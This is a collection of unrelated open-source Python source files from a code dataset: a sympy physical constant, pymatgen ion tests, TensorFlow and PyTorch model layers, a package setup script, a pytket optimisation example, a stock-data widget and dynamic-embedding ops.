import sympy.mpmath.libmp as mlib
#-----------------------------------------------------------------------------
# Constants
#-----------------------------------------------------------------------------
__all__ = [
'hbar'
]
class HBar(with_metaclass(Singleton, NumberSymbol)):
"""Reduced Plank's constant in numerical and symbolic form [1]_.
Examples
========
>>> from sympy.physics.quantum.constants import hbar
>>> hbar.evalf()
1.05457162000000e-34
References
==========
.. [1] http://en.wikipedia.org/wiki/Planck_constant
"""
is_real = True
is_positive = True
is_negative = False
is_irrational = True
__slots__ = []
def _as_mpf_val(self, prec):
return mlib.from_float(1.05457162e-34, prec)
def _sympyrepr(self, printer, *args):
return 'HBar()'
def _sympystr(self, printer, *args):
return 'hbar'
def _pretty(self, printer, *args):
if printer._use_unicode:
return prettyForm(u('\u210f'))
return prettyForm('hbar')
def _latex(self, printer, *args):
return r'\hbar'
# Create an instance for everyone to use.
hbar = HBar()
|
pymatgen/core/tests/test_ion.py
|
chunweizhu/pymatgen
| 921 |
67787
|
# coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
import random
import unittest
from pymatgen.core.composition import Composition
from pymatgen.core.ion import Ion
from pymatgen.core.periodic_table import Element
class IonTest(unittest.TestCase):
def setUp(self):
self.comp = []
self.comp.append(Ion.from_formula("Li+"))
self.comp.append(Ion.from_formula("MnO4-"))
self.comp.append(Ion.from_formula("Mn++"))
self.comp.append(Ion.from_formula("PO3-2"))
self.comp.append(Ion.from_formula("Fe(CN)6-3"))
self.comp.append(Ion.from_formula("Fe(CN)6----"))
self.comp.append(Ion.from_formula("Fe2((PO4)3(CO3)5)2-3"))
self.comp.append(Ion.from_formula("Ca[2+]"))
self.comp.append(Ion.from_formula("NaOH(aq)"))
def test_init_(self):
c = Composition({"Fe": 4, "O": 16, "P": 4})
charge = 4
self.assertEqual("Fe4 P4 O16 +4", Ion(c, charge).formula)
f = {1: 1, 8: 1}
charge = -1
self.assertEqual("H1 O1 -1", Ion(Composition(f), charge).formula)
self.assertEqual("S2 O3 -2", Ion(Composition(S=2, O=3), -2).formula)
def test_formula(self):
correct_formulas = [
"Li1 +1",
"Mn1 O4 -1",
"Mn1 +2",
"P1 O3 -2",
"Fe1 C6 N6 -3",
"Fe1 C6 N6 -4",
"Fe2 P6 C10 O54 -3",
"Ca1 +2",
"Na1 H1 O1",
]
all_formulas = [c.formula for c in self.comp]
self.assertEqual(all_formulas, correct_formulas)
self.assertRaises(ValueError, Ion.from_formula, "(co2)(po4)2")
def test_mixed_valence(self):
comp = Ion(Composition({"Fe2+": 2, "Fe3+": 4, "Li+": 8}))
self.assertEqual(comp.reduced_formula, "Li4Fe3(aq)")
self.assertEqual(comp.alphabetical_formula, "Fe6 Li8")
self.assertEqual(comp.formula, "Li8 Fe6")
def test_alphabetical_formula(self):
correct_formulas = [
"Li1 +1",
"Mn1 O4 -1",
"Mn1 +2",
"O3 P1 -2",
"C6 Fe1 N6 -3",
"C6 Fe1 N6 -4",
"C10 Fe2 O54 P6 -3",
"Ca1 +2",
"H1 Na1 O1",
]
all_formulas = [c.alphabetical_formula for c in self.comp]
self.assertEqual(all_formulas, correct_formulas)
def test_num_atoms(self):
correct_num_atoms = [1, 5, 1, 4, 13, 13, 72, 1, 3]
all_natoms = [c.num_atoms for c in self.comp]
self.assertEqual(all_natoms, correct_num_atoms)
def test_anonymized_formula(self):
expected_formulas = [
"A+1",
"AB4-1",
"A+2",
"AB3-2",
"AB6C6-3",
"AB6C6-4",
"AB3C5D27-3",
"A+2",
"ABC",
]
for i in range(len(self.comp)):
self.assertEqual(self.comp[i].anonymized_formula, expected_formulas[i])
def test_from_dict(self):
sym_dict = {"P": 1, "O": 4, "charge": -2}
self.assertEqual(
Ion.from_dict(sym_dict).reduced_formula,
"PO4[2-]",
"Creation form sym_amount dictionary failed!",
)
def test_as_dict(self):
c = Ion.from_dict({"Mn": 1, "O": 4, "charge": -1})
d = c.as_dict()
correct_dict = {"Mn": 1.0, "O": 4.0, "charge": -1.0}
self.assertEqual(d, correct_dict)
self.assertEqual(d["charge"], correct_dict["charge"])
correct_dict = {"Mn": 1.0, "O": 4.0, "charge": -1}
d = c.to_reduced_dict
self.assertEqual(d, correct_dict)
self.assertEqual(d["charge"], correct_dict["charge"])
def test_equals(self):
random_z = random.randint(1, 92)
fixed_el = Element.from_Z(random_z)
other_z = random.randint(1, 92)
while other_z == random_z:
other_z = random.randint(1, 92)
comp1 = Ion(Composition({fixed_el: 1, Element.from_Z(other_z): 0}), 1)
other_z = random.randint(1, 92)
while other_z == random_z:
other_z = random.randint(1, 92)
comp2 = Ion(Composition({fixed_el: 1, Element.from_Z(other_z): 0}), 1)
self.assertEqual(
comp1,
comp2,
"Composition equality test failed. " + "%s should be equal to %s" % (comp1.formula, comp2.formula),
)
self.assertEqual(comp1.__hash__(), comp2.__hash__(), "Hashcode equality test failed!")
def test_equality(self):
self.assertTrue(self.comp[0] == (self.comp[0]))
self.assertFalse(self.comp[0] == (self.comp[1]))
self.assertFalse(self.comp[0] != (self.comp[0]))
self.assertTrue(self.comp[0] != (self.comp[1]))
def test_mul(self):
self.assertEqual(
(self.comp[1] * 4).formula,
"Mn4 O16 -4",
"Incorrect composition after addition!",
)
def test_len(self):
self.assertEqual(len(self.comp[1]), 2, "Lengths are not equal!")
def test_to_string(self):
self.assertEqual(self.comp[1].to_latex_string(), "Mn$_{1}$ O$_{4}$$^{-1}$")
if __name__ == "__main__":
unittest.main()
|
src/mnist/ops.py
|
val-iisc/deligan
| 117 |
67807
|
import numpy as np
import tensorflow as tf
class batch_norm(object):
"""Code modification of http://stackoverflow.com/a/33950177"""
def __init__(self, epsilon=1e-5, momentum = 0.9, name="batch_norm"):
with tf.variable_scope(name):
self.epsilon = epsilon
self.momentum = momentum
self.ema = tf.train.ExponentialMovingAverage(decay=self.momentum)
self.name = name
def __call__(self, x, train=True):
shape = x.get_shape().as_list()
if train:
with tf.variable_scope(self.name) as scope:
self.beta = tf.get_variable("beta", [shape[-1]],
initializer=tf.constant_initializer(0.))
self.gamma = tf.get_variable("gamma", [shape[-1]],
initializer=tf.random_normal_initializer(1., 0.02))
batch_mean, batch_var = tf.nn.moments(x, [0, 1, 2], name='moments')
ema_apply_op = self.ema.apply([batch_mean, batch_var])
self.ema_mean, self.ema_var = self.ema.average(batch_mean), self.ema.average(batch_var)
with tf.control_dependencies([ema_apply_op]):
mean, var = tf.identity(batch_mean), tf.identity(batch_var)
else:
mean, var = self.ema_mean, self.ema_var
normed = tf.nn.batch_norm_with_global_normalization(
x, mean, var, self.beta, self.gamma, self.epsilon, scale_after_normalization=True)
return normed
# standard convolution layer
def conv2d(x, filter_size, stride, inputFeatures, outputFeatures, name):
with tf.variable_scope(name):
w = tf.get_variable("w",[filter_size,filter_size,inputFeatures, outputFeatures], initializer=tf.truncated_normal_initializer(stddev=0.02))
b = tf.get_variable("b",[outputFeatures], initializer=tf.constant_initializer(0.0))
conv = tf.nn.conv2d(x, w, strides=[1,stride,stride,1], padding="SAME") + b
return conv
def conv_transpose(x, filter_size, stride, outputShape, name):
with tf.variable_scope(name):
# h, w, out, in
w = tf.get_variable("w",[filter_size,filter_size, outputShape[-1], x.get_shape()[-1]], initializer=tf.truncated_normal_initializer(stddev=0.02))
b = tf.get_variable("b",[outputShape[-1]], initializer=tf.constant_initializer(0.0))
convt = tf.nn.conv2d_transpose(x, w, output_shape=outputShape, strides=[1,stride,stride,1])
return convt
# leaky reLu unit
def lrelu(x, leak=0.2, name="lrelu"):
with tf.variable_scope(name):
f1 = 0.5 * (1 + leak)
f2 = 0.5 * (1 - leak)
return f1 * x + f2 * abs(x)
# fully-conected layer
def dense(x, inputFeatures, outputFeatures, scope=None, with_w=False):
with tf.variable_scope(scope or "Linear"):
matrix = tf.get_variable("Matrix", [inputFeatures, outputFeatures], tf.float32, tf.random_normal_initializer(stddev=0.02))
bias = tf.get_variable("bias", [outputFeatures], initializer=tf.constant_initializer(0.0))
if with_w:
return tf.matmul(x, matrix) + bias, matrix, bias
else:
return tf.matmul(x, matrix) + bias
|
setup.py
|
gekco/commandment
| 138 |
67815
|
from setuptools import setup, find_packages
setup(
name="commandment",
version="0.1",
description="Commandment is an Open Source Apple MDM server with support for managing iOS and macOS devices",
packages=['commandment'],
include_package_data=True,
author="mosen",
license="MIT",
url="https://github.com/cmdmnt/commandment",
classifiers=[
'Development Status :: 3 - Alpha',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.6'
],
keywords='MDM',
install_requires=[
'acme==0.34.2',
'alembic==1.0.10',
'apns2-client==0.5.4',
'asn1crypto==0.24.0',
'authlib==0.11',
'biplist==1.0.3',
'blinker>=1.4',
'cryptography==2.6.1',
'flask==1.0.3',
'flask-alembic==2.0.1',
'flask-cors==3.0.4',
'flask-jwt==0.3.2',
'flask-marshmallow==0.10.1',
'flask-rest-jsonapi==0.29.0',
'flask-sqlalchemy==2.4.0',
'marshmallow==2.18.0',
'marshmallow-enum==1.4.1',
'marshmallow-jsonapi==0.21.0',
'marshmallow-sqlalchemy==0.16.3',
'oscrypto==0.19.1',
'passlib==1.7.1',
'requests==2.22.0',
'semver',
'sqlalchemy==1.3.3',
'typing==3.6.4'
],
python_requires='>=3.6',
tests_require=[
'factory-boy==2.10.0',
'faker==0.8.10',
'mock==2.0.0',
'mypy==0.560'
'pytest==3.4.0',
'pytest-runner==3.0'
],
extras_requires={
'ReST': [
'sphinx-rtd-theme',
'guzzle-sphinx-theme',
'sadisplay==0.4.8',
'sphinx==1.7.0b2',
'sphinxcontrib-httpdomain==1.6.0',
'sphinxcontrib-napoleon==0.6.1',
'sphinxcontrib-plantuml==0.10',
],
'macOS': [
'pyobjc'
]
},
setup_requires=['pytest-runner'],
entry_points={
'console_scripts': [
'commandment=commandment.cli:server',
'appmanifest=commandment.pkg.appmanifest:main',
]
},
zip_safe=False
)
|
examples/python/contextual_optimization.py
|
CQCL/pytket
| 249 |
67824
|
# # Contextual optimisation
# This notebook will illustrate the techniques of "contextual optimisation" available in TKET.
# See the user manaul for an introduction to the concept and methods. Here we will present an example showing how we can save some gates at the beginnning and end of a circuit, making no assumptions about the structure of the circuit.
# We will take as an example an ansatz circuit consisting of alternating layers of Ry and CX gates, where some proportion of the Ry angles are zero. This is a typical ansatz for variational algorithms, used for solving diagonal Hamiltonians for combinatorial optimisation.
from pytket.circuit import Circuit
from random import random, randrange, seed
def random_sparse_ansatz(n_qubits, n_layers, p, rng_seed=None):
seed(rng_seed)
circ = Circuit(n_qubits)
for q in range(n_qubits):
if random() < p:
circ.Ry(0.1 * randrange(20), q)
for l in range(n_layers):
for q in range(0, n_qubits - 1, 2):
circ.CX(q, q + 1)
for q in range(2 * (n_qubits // 2)):
if random() < p:
circ.Ry(0.1 * randrange(20), q)
for q in range(1, n_qubits - 1, 2):
circ.CX(q, q + 1)
for q in range(2 * ((n_qubits - 1) // 2)):
if random() < p:
circ.Ry(0.1 * randrange(20), q + 1)
circ.measure_all()
return circ
# Let's examine a smallish example:
from pytket.circuit import OpType
from pytket.circuit.display import render_circuit_jupyter
c = random_sparse_ansatz(4, 3, 0.5, rng_seed=0)
render_circuit_jupyter(c)
print("Number of CX:", c.n_gates_of_type(OpType.CX))
# Contextual optimizations allow us to shave some gates from the beginning and end of the circuit. Those at the end get commuted through the Measure gates into a classical post-processing circuit, which we can then pass to `BackendResult` methods to have the postprocessing performed automatically.
# The `prepare_circuit()` method returns a pair of circuits, the first of which is what we actually run and the second of specifies the required postprocessing.
from pytket.utils import prepare_circuit
c0, ppcirc = prepare_circuit(c)
render_circuit_jupyter(c0)
print("Number of CX:", c0.n_gates_of_type(OpType.CX))
# In this case, one CX has been shaved from the beginning of the circuit and two from the end.
# We can run the processed circuit on our backend:
from pytket.extensions.qiskit import AerBackend
b = AerBackend()
b.compile_circuit(c0)
h = b.process_circuit(c0, n_shots=10)
r = b.get_result(h)
# And finally get the counts or shots, accounting for the classical postprocessing:
counts = r.get_counts(ppcirc=ppcirc)
print(counts)
# See the [pytket user manual](https://cqcl.github.io/pytket/manual/manual_compiler.html#contextual-optimisations) for more details about contextual optimisations and how to apply them in TKET.
|
pytorch_toolkit/face_recognition/model/blocks/mobilenet_v2_blocks.py
|
AnastasiaaSenina/openvino_training_extensions
| 158 |
67867
|
<filename>pytorch_toolkit/face_recognition/model/blocks/mobilenet_v2_blocks.py
"""
Copyright (c) 2018 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import torch.nn as nn
from model.blocks.shared_blocks import SELayer
class InvertedResidual(nn.Module):
"""Implementation of the modified Inverted residual block"""
def __init__(self, in_channels, out_channels, stride, expand_ratio, outp_size=None):
super(InvertedResidual, self).__init__()
self.stride = stride
assert stride in [1, 2]
self.use_res_connect = self.stride == 1 and in_channels == out_channels
self.inv_block = nn.Sequential(
nn.Conv2d(in_channels, in_channels * expand_ratio, 1, 1, 0, bias=False),
nn.BatchNorm2d(in_channels * expand_ratio),
nn.PReLU(),
nn.Conv2d(in_channels * expand_ratio, in_channels * expand_ratio, 3, stride, 1,
groups=in_channels * expand_ratio, bias=False),
nn.BatchNorm2d(in_channels * expand_ratio),
nn.PReLU(),
nn.Conv2d(in_channels * expand_ratio, out_channels, 1, 1, 0, bias=False),
nn.BatchNorm2d(out_channels),
SELayer(out_channels, 8, nn.PReLU, outp_size)
)
def forward(self, x):
if self.use_res_connect:
return x + self.inv_block(x)
return self.inv_block(x)
|
s3prl/downstream/voxceleb2_ge2e/model.py
|
hhhaaahhhaa/s3prl
| 856 |
67873
|
<filename>s3prl/downstream/voxceleb2_ge2e/model.py
# -*- coding: utf-8 -*- #
"""*********************************************************************************************"""
# FileName [ model.py ]
# Synopsis [ the linear model ]
# Author [ S3PRL ]
# Copyright [ Copyleft(c), Speech Lab, NTU, Taiwan ]
"""*********************************************************************************************"""
###############
# IMPORTATION #
###############
import torch
import torch.nn as nn
import torch.nn.functional as F
from functools import lru_cache
from argparse import Namespace
from s3prl.upstream.mockingjay.model import TransformerEncoder
#########
# MODEL #
#########
class Identity(nn.Module):
def __init__(self, config, **kwargs):
super(Identity, self).__init__()
# simply pass pretrained vector
def forward(self, feature, att_mask, head_mask, **kwargs):
return [feature]
class Mean(nn.Module):
def __init__(self, out_dim):
super(Mean, self).__init__()
self.act_fn = nn.Tanh()
self.linear = nn.Linear(out_dim, out_dim)
# simply take mean operator / no additional parameters
def forward(self, feature, att_mask):
'''
we use 1 hidden layer and applied mean pooling in the end to generate utterance-level representation
Arguments
feature - [BxTxD] Acoustic feature with shape
att_mask - [BxTx1] Attention Mask logits
'''
feature=self.linear(self.act_fn(feature))
agg_vec_list = []
for i in range(len(feature)):
if torch.nonzero(att_mask[i] < 0, as_tuple=False).size(0) == 0:
length = len(feature[i])
else:
length = torch.nonzero(att_mask[i] < 0, as_tuple=False)[0] + 1
agg_vec=torch.mean(feature[i][:length], dim=0)
agg_vec_list.append(agg_vec)
return torch.stack(agg_vec_list)
class SAP(nn.Module):
''' Self Attention Pooling module incoporate attention mask'''
def __init__(self, out_dim):
super(SAP, self).__init__()
# Setup
self.act_fn = nn.Tanh()
self.sap_layer = SelfAttentionPooling(out_dim)
def forward(self, feature, att_mask):
'''
Arguments
feature - [BxTxD] Acoustic feature with shape
att_mask - [BxTx1] Attention Mask logits
'''
#Encode
feature = self.act_fn(feature)
sap_vec = self.sap_layer(feature, att_mask)
return sap_vec
class SelfAttentionPooling(nn.Module):
"""
Implementation of SelfAttentionPooling
Original Paper: Self-Attention Encoding and Pooling for Speaker Recognition
https://arxiv.org/pdf/2008.01077v1.pdf
"""
def __init__(self, input_dim):
super(SelfAttentionPooling, self).__init__()
self.W = nn.Linear(input_dim, 1)
self.softmax = nn.functional.softmax
def forward(self, batch_rep, att_mask):
"""
input:
batch_rep : size (N, T, H), N: batch size, T: sequence length, H: Hidden dimension
attention_weight:
att_w : size (N, T, 1)
return:
utter_rep: size (N, H)
"""
seq_len = batch_rep.shape[1]
att_logits = self.W(batch_rep).squeeze(-1)
att_logits = att_mask + att_logits
att_w = self.softmax(att_logits, dim=-1).unsqueeze(-1)
utter_rep = torch.sum(batch_rep * att_w, dim=1)
return utter_rep
class Model(nn.Module):
def __init__(self, input_dim, agg_module, config):
super(Model, self).__init__()
# agg_module: current support [ "SAP", "Mean" ]
# init attributes
self.agg_method = eval(agg_module)(input_dim)
self.model= eval(config['module'])(config=Namespace(**config['hparams']),)
self.head_mask = [None] * config['hparams']['num_hidden_layers']
def forward(self, features, att_mask):
features = self.model(features,att_mask[:,None,None], head_mask=self.head_mask, output_all_encoded_layers=False)
utterance_vector = self.agg_method(features[0], att_mask)
return utterance_vector
class GE2E(nn.Module):
"""Implementation of the GE2E loss in https://arxiv.org/abs/1710.10467 [1]
Accepts an input of size (N, M, D)
where N is the number of speakers in the batch,
M is the number of utterances per speaker,
and D is the dimensionality of the embedding vector (e.g. d-vector)
Args:
- init_w (float): the initial value of w in Equation (5) of [1]
- init_b (float): the initial value of b in Equation (5) of [1]
"""
def __init__(self, init_w=10.0, init_b=-5.0, loss_method='softmax'):
super(GE2E, self).__init__()
self.w = nn.Parameter(torch.tensor(init_w))
self.b = nn.Parameter(torch.tensor(init_b))
self.loss_method = loss_method
assert self.loss_method in ['softmax', 'contrast']
if self.loss_method == 'softmax':
self.embed_loss = self.embed_loss_softmax
if self.loss_method == 'contrast':
self.embed_loss = self.embed_loss_contrast
def cosine_similarity(self, dvecs):
"""Calculate cosine similarity matrix of shape (N, M, N)."""
n_spkr, n_uttr, d_embd = dvecs.size()
dvec_expns = dvecs.unsqueeze(-1).expand(n_spkr, n_uttr, d_embd, n_spkr)
dvec_expns = dvec_expns.transpose(2, 3)
ctrds = dvecs.mean(dim=1).to(dvecs.device)
ctrd_expns = ctrds.unsqueeze(0).expand(n_spkr * n_uttr, n_spkr, d_embd)
ctrd_expns = ctrd_expns.reshape(-1, d_embd)
dvec_rolls = torch.cat([dvecs[:, 1:, :], dvecs[:, :-1, :]], dim=1)
dvec_excls = dvec_rolls.unfold(1, n_uttr-1, 1)
mean_excls = dvec_excls.mean(dim=-1).reshape(-1, d_embd)
indices = _indices_to_replace(n_spkr, n_uttr).to(dvecs.device)
ctrd_excls = ctrd_expns.index_copy(0, indices, mean_excls)
ctrd_excls = ctrd_excls.view_as(dvec_expns)
return F.cosine_similarity(dvec_expns, ctrd_excls, 3, 1e-9)
def embed_loss_softmax(self, dvecs, cos_sim_matrix):
"""Calculate the loss on each embedding by taking softmax."""
n_spkr, n_uttr, _ = dvecs.size()
indices = _indices_to_replace(n_spkr, n_uttr).to(dvecs.device)
losses = -F.log_softmax(cos_sim_matrix, 2)
return losses.flatten().index_select(0, indices).view(n_spkr, n_uttr)
def embed_loss_contrast(self, dvecs, cos_sim_matrix):
"""Calculate the loss on each embedding by contrast loss."""
N, M, _ = dvecs.shape
L = []
for j in range(N):
L_row = []
for i in range(M):
centroids_sigmoids = torch.sigmoid(cos_sim_matrix[j, i])
excl_centroids_sigmoids = torch.cat(
(centroids_sigmoids[:j], centroids_sigmoids[j+1:]))
L_row.append(1. - torch.sigmoid(cos_sim_matrix[j, i, j]) +
torch.max(excl_centroids_sigmoids))
L_row = torch.stack(L_row)
L.append(L_row)
return torch.stack(L)
def forward(self, dvecs):
"""Calculate the GE2E loss for an input of dimensions (N, M, D)."""
cos_sim_matrix = self.cosine_similarity(dvecs)
torch.clamp(self.w, 1e-9)
cos_sim_matrix = cos_sim_matrix * self.w + self.b
L = self.embed_loss(dvecs, cos_sim_matrix)
return L.sum()
@lru_cache(maxsize=5)
def _indices_to_replace(n_spkr, n_uttr):
indices = [(s * n_uttr + u) * n_spkr + s
for s in range(n_spkr) for u in range(n_uttr)]
return torch.LongTensor(indices)
|
Stock/Common/Ui/Deal/Basic/DyStockDealDetailsWidget.py
|
Leonardo-YXH/DevilYuan
| 135 |
67905
|
<gh_stars>100-1000
from DyCommon.Ui.DyStatsTableWidget import *
class DyStockDealDetailsWidget(DyStatsTableWidget):
colNames = ['时间', '价格', '成交量(手)', '类型']
def __init__(self, dataEngine):
super().__init__(None, True, False, autoScroll=False)
self._ticksEngine = dataEngine.ticksEngine
self._daysEngine = dataEngine.daysEngine
self.setColNames(self.colNames + ['换手(万分之)'])
def setInfoWidget(self, widget):
self._infoWidget = widget
def set(self, code, date, n = 0):
date = self._daysEngine.codeTDayOffset(code, date, n)
if date is None: return
self._code = code
self._day = date
if not self._ticksEngine.loadCode(code, date):
return
df = self._ticksEngine.getDataFrame(code)
self._set(df)
def getForegroundOverride(self, value):
if value == '买盘':
color = Qt.red
elif value == '卖盘':
color = Qt.darkGreen
else:
color = None
return color
def _set(self, df):
df.drop('amount', axis=1, inplace=True)
df.reset_index(inplace=True) # 把时间索引转成列
df[['datetime']] = df['datetime'].map(lambda x: x.strftime('%H:%M:%S'))
df.rename(columns={'datetime':'时间', 'price':'价格', 'volume':'成交量(手)', 'type':'类型'}, inplace=True)
df.reindex(columns=self.colNames, copy=False)
# 计算每笔的换手率
volumeSeries = df['成交量(手)']
volumeSum = volumeSeries.sum()
df['换手(万分之)'] = volumeSeries * ((self._infoWidget.turn*100)/volumeSum)
rows = df.values.tolist()
self.fastAppendRows(rows, '类型', True)
def forward(self):
self.set(self._code, self._day, -1)
def backward(self):
self.set(self._code, self._day, 1)
|
research/carls/dynamic_embedding_ops.py
|
srihari-humbarwadi/neural-structured-learning
| 939 |
67911
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""DynamicEmbedding related ops."""
import typing
from research.carls import context
from research.carls import dynamic_embedding_config_pb2 as de_config_pb2
from research.carls.kernels import gen_carls_ops
import tensorflow as tf
class DynamicEmbeddingLookup(tf.keras.layers.Layer):
"""A Keras Layer for Dynamic Embedding Lookup.
This is useful when the gradient descent update is required for embedding
lookup. The input of this layer is a `Tensor` of string keys and it outputs
the embedding output as a float `Tensor`.
"""
def __init__(self,
config: de_config_pb2.DynamicEmbeddingConfig,
var_name: typing.Text,
service_address: typing.Text = "",
timeout_ms: int = -1):
"""Constructor for DynamicEmbeddingLookup.
Args:
config: A DynamicEmbeddingConfig proto that configures the embedding.
var_name: A unique name for the given embedding.
service_address: The address of a knowledge bank service. If empty, the
value passed from --kbs_address (defined in
.../carls/dynamic_embedding_manager.cc) flag will be used instead.
timeout_ms: Timeout millseconds for the connection. If negative, never
timout.
Raises:
ValueError: if var_name is `None` or empty.
"""
super(DynamicEmbeddingLookup, self).__init__()
if not var_name:
raise ValueError("Must specify a non-empty var_name.")
self.embedding_dimension = config.embedding_dimension
context.add_to_collection(var_name, config)
self.resource = gen_carls_ops.dynamic_embedding_manager_resource(
config.SerializeToString(), var_name, service_address, timeout_ms)
def build(self, input_shape):
del input_shape # Not used.
# Creates a placeholder variable for the dynamic_embedding_lookup() such
# that the gradients can be passed into _dynamic_embedding_lookup_grad().
self.grad_placeholder = self.add_weight(
name="grad_placeholder",
shape=[1],
dtype=tf.float32,
trainable=True,
initializer=tf.keras.initializers.zeros)
def call(self, keys):
return gen_carls_ops.dynamic_embedding_lookup(keys, self.grad_placeholder,
self.resource,
self.embedding_dimension)
def dynamic_embedding_lookup(keys: tf.Tensor,
config: de_config_pb2.DynamicEmbeddingConfig,
var_name: typing.Text,
service_address: typing.Text = "",
skip_gradient_update: bool = False,
timeout_ms: int = -1) -> tf.Tensor:
"""Returns the embeddings of from given keys.
Args:
keys: A string `Tensor` of shape [batch_size] or [batch_size,
max_sequence_length] where an empty string would be mapped to an all zero
embedding.
config: A DynamicEmbeddingConfig proto that configures the embedding.
var_name: A unique name for the given embedding.
service_address: The address of a knowledge bank service. If empty, the
value passed from --kbs_address flag will be used instead.
skip_gradient_update: A boolean indicating if gradient update is needed.
timeout_ms: Timeout millseconds for the connection. If negative, never
timout.
Returns:
A `Tensor` of shape with one of below:
- [batch_size, config.embedding_dimension] if the input Tensor is 1D, or
- [batch_size, max_sequence_length, config.embedding_dimension] if the
input is 2D.
Raises:
ValueError: If name is not specified.
"""
if not var_name:
raise ValueError("Must specify a valid var_name.")
# If skip_gradient_update is true, reate a dummy variable so that the
# gradients can be passed in.
if skip_gradient_update:
grad_placeholder = tf.constant(0.0)
else:
grad_placeholder = tf.Variable(0.0)
context.add_to_collection(var_name, config)
resource = gen_carls_ops.dynamic_embedding_manager_resource(
config.SerializeToString(), var_name, service_address, timeout_ms)
return gen_carls_ops.dynamic_embedding_lookup(keys, grad_placeholder,
resource,
config.embedding_dimension)
def dynamic_embedding_update(keys: tf.Tensor,
values: tf.Tensor,
config: de_config_pb2.DynamicEmbeddingConfig,
var_name: typing.Text,
service_address: typing.Text = "",
timeout_ms: int = -1):
"""Updates the embeddings of given keys with given values.
Args:
keys: A string `Tensor` of shape [batch] or [batch_size,
max_sequence_length].
values: A `Tensor` of shape [batch_size, embedding_dimension] or
[batch_size, max_sequence_length, embedding_dimension].
config: A DynamicEmbeddingConfig proto that configures the embedding.
var_name: A unique name for the given embedding.
service_address: The address of a dynamic embedding service. If empty, the
value passed from --kbs_address flag will be used instead.
timeout_ms: Timeout millseconds for the connection. If negative, never
timout.
Returns:
A `Tensor` of shape with one of below:
- [batch_size, config.embedding_dimension] if the input Tensor is 1D, or
- [batch_size, max_sequence_length, config.embedding_dimension] if the
input is 2D.
Raises:
TypeError: If var_name is not specified.
"""
if not var_name:
raise TypeError("Must specify a valid var_name.")
context.add_to_collection(var_name, config)
resource = gen_carls_ops.dynamic_embedding_manager_resource(
config.SerializeToString(), var_name, service_address, timeout_ms)
return gen_carls_ops.dynamic_embedding_update(keys, values, resource,
config.embedding_dimension)
@tf.RegisterGradient("DynamicEmbeddingLookup")
def _dynamic_embedding_lookup_grad(op, grad):
"""The gradient for DynamicEmbeddingLookup.
Args:
op: The gen_de_op.dynamic_embedding_lookup() op.
grad: The tensor representing the gradient w.r.t. the output of the
gen_de_op.dynamic_embedding_lookup() op.
Returns:
The gradients w.r.t. the input of the gen_de_op.dynamic_embedding_lookup()
op.
"""
grad = tf.reshape(grad, [-1, grad.shape[-1]])
return gen_carls_ops.dynamic_embedding_lookup_grad(
op.inputs[0], # keys
grad,
op.inputs[2] # resource
)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.